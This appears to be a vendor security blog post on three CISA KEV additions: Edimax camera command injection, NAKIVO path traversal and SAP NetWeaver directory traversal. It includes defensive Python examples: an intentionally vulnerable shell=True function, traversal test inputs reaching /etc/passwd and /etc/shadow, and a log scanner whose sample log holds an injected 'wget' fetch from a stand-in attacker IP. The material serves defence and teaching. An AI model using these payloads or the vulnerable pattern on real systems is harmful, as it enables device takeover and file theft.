CISA adds CVE-2025-1316, CVE-2024-48248, and CVE-2017-12637 to its Known Exploited Vulnerabilities (KEV) Catalog, warning that all three are being actively exploited against critical systems and services.
The most concerning of the three is CVE-2025-1316, which affects the Edimax IC-7100 IP camera. Disclosed in a CISA ICS advisory on March 4, 2025, it is an OS command injection vulnerability (CWE-78) that lets a remote attacker execute arbitrary operating-system commands on the device.
The IC-7100 does not properly neutralize special elements in request data before incorporating that data into an OS command. An attacker who can reach the camera's web interface can therefore send a request whose parameter carries shell metacharacters followed by additional commands, and the firmware runs them on the device. No memory corruption or credential is needed; the flaw is simply that untrusted input reaches a shell.
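The following is an added example, not code from Edimax, CISA or the original post: it reproduces the CWE-78 pattern behind CVE-2025-1316 in Python and shows the two-part fix. The camera's real handler is native firmware and its parameter names are not known here; `echo` stands in for whatever network utility the firmware invokes with request data, and the attacker input is constructed.

```python
# Added example, not code from Edimax or from CISA: the CWE-78 pattern behind
# CVE-2025-1316 reproduced in Python, with the fix. The camera's real handler
# is native firmware and its parameter names are not known here; `echo`
# stands in for whatever utility the firmware invokes with request data.
import ipaddress
import re
import subprocess

# RFC 1123 hostname grammar: dot-separated labels of letters, digits, hyphens.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_echo(target: str) -> str:
    """Vulnerable pattern: request data interpolated into a shell command line.
    /bin/sh parses the string, so ';', '|', '&&', '`' and '$(...)' inside
    `target` start new commands."""
    result = subprocess.run(f"echo {target}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def argv_only_echo(target: str) -> str:
    """Argv form without validation: no shell is involved, so `target` is a
    single argument however many metacharacters it contains."""
    result = subprocess.run(["echo", target], capture_output=True, text=True)
    return result.stdout


def is_valid_target(target: str) -> bool:
    """Allow-list check: an IP literal or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return _HOSTNAME_RE.match(target) is not None


def hardened_echo(target: str) -> str:
    """Hardened pattern: reject anything outside the allow-list, then use argv.
    Validation alone is not enough (a later refactor may reintroduce a shell),
    and argv alone still lets odd values reach the utility, so do both."""
    if not is_valid_target(target):
        raise ValueError(f"rejected target: {target!r}")
    return argv_only_echo(target)


if __name__ == "__main__":
    payload = "8.8.8.8; echo INJECTED"   # constructed attacker input
    print(repr(vulnerable_echo(payload)))  # '8.8.8.8\nINJECTED\n': second command ran
    print(repr(argv_only_echo(payload)))   # '8.8.8.8; echo INJECTED\n': one argument
    try:
        hardened_echo(payload)
    except ValueError as exc:
        print(exc)
```

Running the block shows the whole bug in one line of output: with `shell=True` the `;` ends the first command and `INJECTED` is printed by a second one, while the argv form hands the same string to `echo` as a single argument. When reviewing firmware or CGI code, the question to ask of every `system()`, `popen()` or `sh -c` call is whether any byte of the command string came from the request.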
The impact is severe: an attacker who controls the camera can view or exfiltrate video, install malware that persists on the device, and use it as a foothold to reach other hosts on the same network. CISA assigned CVE-2025-1316 a CVSS v4 base score of 9.3, reflecting that it is exploitable over the network and yields full control of the device.
CISA strongly recommends that organizations using Edimax IC-7100 cameras act immediately to reduce exposure: ensure the camera is not reachable from the internet, place it on an isolated network segment behind a firewall rather than on the business LAN, and, where remote access is needed, allow it only through a VPN, remembering that the VPN endpoint itself must be kept patched and is only as secure as the devices that connect through it. Cameras that cannot be updated should be inventoried and scheduled for replacement.
The second addition is CVE-2024-48248, an absolute path traversal vulnerability (CWE-36) in NAKIVO Backup & Replication, publicly disclosed in early 2025. The product's /c/router interface (TCP port 4443) exposes a getImageByPath method that takes a file path from the caller and returns that file's contents. Because the path is used as supplied, with no check that it lies inside the intended directory, an attacker does not even need .. sequences: passing an absolute path such as /etc/passwd is enough to read any file the service account can read.
The flaw affects NAKIVO Backup & Replication versions before 11.0.0.88174. Exploitation gives an attacker arbitrary file read on the backup server, which is especially damaging because a backup product stores configuration and credentials for the systems it protects, and those files are exactly what an attacker reads first. CISA emphasizes updating to a fixed version. Organizations should also restrict network access to the management interface, review which hosts can reach port 4443, and audit their own file-serving code for the same class of bug: any path taken from a request must be normalized and then checked against an allow-listed base directory.
The third entry is CVE-2017-12637, a directory traversal vulnerability in SAP NetWeaver Application Server Java, the platform on which many SAP enterprise applications, including its ERP products, run. The CVE was published in August 2017, when exploitation in the wild had already been reported, and it has resurfaced in CISA's catalog because it is being exploited again. It allows an attacker to read arbitrary files by placing path-manipulation sequences in a web request's query string, the classic directory traversal technique.
Specifically, SAP NetWeaver AS Java 7.5 is vulnerable through the scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS servlet. A request whose query string contains .. (dot dot) sequences is resolved relative to the web root without normalization, so the attacker can walk up out of the application directory and retrieve files on the underlying server. SAP addressed the issue in Security Note 2486657. Exploitation discloses confidential files, including configuration that may hold credentials, and gives an attacker material for follow-on attacks against the SAP landscape.
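Both traversal bugs above come from the same missing check, so here is one added example, not code from NAKIVO, SAP or the original post, of a file-path confinement helper that rejects both request shapes: an absolute path passed straight through (CWE-36, as in CVE-2024-48248) and `..` segments that climb out of the web root (CWE-22, as in CVE-2017-12637). It uses `posixpath` so the results are the same on any host; the base directory and request values in the block are made up for the example.

```python
# Added example, not code from NAKIVO or SAP: a file-path confinement check
# of the kind both products lacked. It rejects an absolute path passed
# straight through (CWE-36, CVE-2024-48248) and '..' segments that climb out
# of the web root (CWE-22, CVE-2017-12637). posixpath is used so behaviour
# is host-independent; base_dir and the sample requests are constructed.
import posixpath
from urllib.parse import unquote


class TraversalError(ValueError):
    """Raised when a requested path would leave the base directory."""


def vulnerable_resolve(base_dir: str, requested: str) -> str:
    """The flawed logic: join and trust. posixpath.join discards base_dir when
    `requested` is absolute, and normpath follows '..' above the base."""
    return posixpath.normpath(posixpath.join(base_dir, requested))


def _decode(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so %2e%2e and %252e%252e become '..'."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value


def safe_resolve(base_dir: str, requested: str) -> str:
    """Return an absolute path inside base_dir, or raise TraversalError.

    Order matters: decode first, then reject absolute paths and NULs, then
    normalise and compare against the base with a real path-prefix test
    (str.startswith would accept /srv/www-old for base /srv/www)."""
    base = posixpath.normpath(base_dir)
    decoded = _decode(requested)
    if "\x00" in decoded:
        raise TraversalError("NUL byte in path")
    decoded = decoded.replace("\\", "/")  # treat backslash as a separator too
    if posixpath.isabs(decoded):
        raise TraversalError(f"absolute path rejected: {requested!r}")
    candidate = posixpath.normpath(posixpath.join(base, decoded))
    if posixpath.commonpath([base, candidate]) != base:
        raise TraversalError(f"escapes base directory: {requested!r}")
    return candidate


def is_confined(base_dir: str, requested: str) -> bool:
    """Convenience wrapper: True if safe_resolve accepts the request."""
    try:
        safe_resolve(base_dir, requested)
        return True
    except TraversalError:
        return False


if __name__ == "__main__":
    base = "/srv/app/webroot"
    for req in ["js/ui.js", "/etc/passwd", "/../../../../etc/passwd",
                "%252e%252e/%252e%252e/etc/shadow", "..\\..\\etc\\passwd"]:
        print(f"{req!r:40} vulnerable -> {vulnerable_resolve(base, req)!r:45} "
              f"confined: {is_confined(base, req)}")
```

Two caveats for real deployments: `posixpath` does not touch the filesystem, so a symlink inside the base directory can still point outside it (resolve the final candidate with `os.path.realpath` and repeat the prefix check before opening), and the decode loop is bounded deliberately, because an unbounded loop turns into a denial-of-service lever.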
CISA urges SAP NetWeaver users to apply the patch immediately if they have not already done so. A fix that has been available since 2017 and is still missing usually means the system has sat outside routine patching, so a wider review of that system is warranted, in particular whether the Java stack is reachable from the internet and whether its web logs show traversal attempts.
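As an added example, not code from CISA or any of the vendors, the following heuristic scan reads web access logs for the request shapes behind the three KEV entries: `..` segments (raw or percent-encoded) anywhere in the request target, with an extra tag when the target is the UIUtilJavaScriptJS servlet named in the SAP advisory, and shell metacharacters in the query string of a CGI endpoint, as a camera-style command injection would carry. The log lines and the CGI path in them are constructed for the example; the NAKIVO getImageByPath call travels in a POST body, which standard access logs do not record, so it is not covered here.

```python
# Added example, not from CISA or any vendor: heuristic access-log scan for
# the request shapes behind CVE-2017-12637 (dot-dot traversal against the
# UIUtilJavaScriptJS servlet) and CVE-2025-1316-style CGI command injection.
# Log format assumed: Common/Combined Log Format. All sample lines and the
# /cgi-bin/admin/set.cgi endpoint are constructed, not real traffic.
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r"(^|[/\\])\.\.([/\\]|$)")  # a whole '..' segment
SHELL_META_RE = re.compile(r"[;|&`$\n]")            # shell control characters


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value


def classify_request(target: str) -> list:
    """Return heuristic tags for one request target (path plus query string)."""
    tags = []
    path, _, query = target.partition("?")
    dpath, dquery = decode_fully(path), decode_fully(query)
    if TRAVERSAL_RE.search(dpath) or TRAVERSAL_RE.search(dquery):
        tags.append("path-traversal")
        if "UIUtilJavaScriptJS" in dpath:
            tags.append("CVE-2017-12637-pattern")
    if dpath.lower().endswith(".cgi") and SHELL_META_RE.search(dquery):
        tags.append("shell-metachar-in-cgi-query")
    return tags


def scan_log(lines: list) -> list:
    """Parse each line and keep those whose target earns at least one tag."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        tags = classify_request(m["target"])
        if tags:
            hits.append({"ip": m["ip"], "method": m["method"],
                         "target": m["target"], "status": m["status"],
                         "tags": tags})
    return hits


SAMPLE_LOG = [  # constructed lines, not real traffic
    '10.0.0.5 - - [19/Mar/2025:10:01:02 +0000] "GET /irj/portal HTTP/1.1" 200 5120',
    '203.0.113.9 - - [19/Mar/2025:10:01:07 +0000] "GET /scheduler/ui/js/ffffffffbca41eb4/'
    'UIUtilJavaScriptJS?/../../../../../../etc/passwd HTTP/1.1" 200 1421',
    '198.51.100.23 - - [19/Mar/2025:10:02:41 +0000] "GET /cgi-bin/admin/set.cgi?'
    'server=1.2.3.4;wget%20http://198.51.100.23/x.sh HTTP/1.1" 200 0',
    '203.0.113.9 - - [19/Mar/2025:10:03:15 +0000] "GET /static/%252e%252e/%252e%252e/'
    'etc/shadow HTTP/1.1" 404 217',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["tags"], hit["target"])
```

The status code is kept in each hit because it separates a probe from a success: a 200 with a non-trivial response size on the traversal line above is the one to escalate, a 404 is reconnaissance. Tune the CGI rule to the device's actual endpoints before relying on it, and expect legitimate `$` or `&` in some query strings; the point of the scan is to produce a short list to read, not a verdict.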
Addressing CVE-2025-1316, CVE-2024-48248, and CVE-2017-12637 matters for protecting critical infrastructure and sensitive data, and for U.S. federal civilian agencies a KEV listing carries a remediation deadline under BOD 22-01. Organizations should implement the mitigations CISA recommends: patch where a fix exists, restrict and monitor access to management interfaces, and isolate devices that cannot be patched.
As the threat landscape evolves, the importance of leveraging advanced cybersecurity solutions cannot be overstated. Cyble, a leader in AI-driven cybersecurity, plays a crucial role in helping organizations stay protected from cyber adversaries. With its cutting-edge threat intelligence platforms, like Cyble Vision, Cyble empowers enterprises, government bodies, and law enforcement agencies to proactively detect and defend against cyber threats.
Disclaimer: This blog is based on our research and the information available at the time of writing. It is for informational purposes only and does not constitute legal, financial, or professional advice. While we strive for accuracy, we do not guarantee the completeness or reliability of the content. If any sensitive information has been inadvertently included, please contact us for correction. Cyble is not responsible for any errors, omissions, or decisions made based on this content. Readers should verify findings and seek expert advice where necessary. All trademarks, logos, and third-party content belong to their respective owners and do not imply endorsement or affiliation. All content is presented "as is" without any guarantee that it is free of confidential, proprietary, or otherwise sensitive information. If you believe any portion of this content contains inadvertently shared or sensitive data, please contact us immediately so that we may address and rectify the issue. No Liability for Errors or Omissions: Due to the dynamic nature of cyber threat activity, this blog may include partial, outdated, or otherwise incorrect information due to unverified sources, evolving security threats, or human error. We expressly disclaim any liability for errors or omissions or any potential consequences arising from the use, misuse, or reliance on this information.